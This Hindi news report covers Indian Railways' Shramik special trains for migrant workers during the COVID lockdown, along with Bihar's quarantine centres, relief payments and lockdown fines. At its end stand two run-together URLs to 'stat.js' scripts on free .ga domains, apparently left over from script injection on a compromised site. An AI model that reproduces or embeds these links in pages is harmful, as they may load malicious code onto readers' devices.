भारतीय रेल एक मई से अबतक 67 श्रमिक विशेष ट्रेनें चला चुका है, जिनमें करीब 67 हजार श्रमिक यात्रा कर चुके हैं। रेलवे के अनुसार चार मई तक 55 ट्रेनें चलाई जा चुका थीं। मंगलवार को 21 ट्रेन चलाई गई, जो मुख्य रूप से बेंगलुरू, सूरत, साबरमती, जालंधनर, कोटा, एर्णाकुलम से रवाना हुई। हर ट्रेन में औसतन एक हजार यात्री सवारी कर रह हैं।

बिहार के सूचना एवं जनसंपर्क विभाग के सचिव अनुपम कुमार ने कहा कि मंगलवार को विभिन्न राज्यों से दस ट्रेनें और बुधवार को 12 ट्रेनें पहुंच रही हैं। उन्होंने मंगलवार को प्रेस कांफ्रेंस में यह जानकारी दी। कहा कि अगले कुछ दिनों में 60 ट्रेनें खुलने के तैयार हैं, जिसकी सूचना मिल चुकी है। प्रखंड स्तरीय क्वारटाइन सेंटर के लिए 2900 भवन चिह्नित कर लिये गए हैं, जहां पर बाहर से आनेवाले लोगों को रखना है।

बाहर रहने वाले 19 लाख 16 हजार लोगों के खाते में मुख्यमंत्री सहायता के रूप में एक-एक हजार की राशि भेज दी गई है। राज्य के अंदर 201 आपदा राहत केंद्र अभी चल रहे हैं, जहां पर 62774 लोग रह रहे हैं। इस मौके पर एडीजी मुख्यालय जितेंद्र कुमार ने कहा कि लॉकडाउन का उल्लंघन करने वाले वाहनों से अभी तक 13 करोड़ की वसूली की गई है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published. Required fields are marked *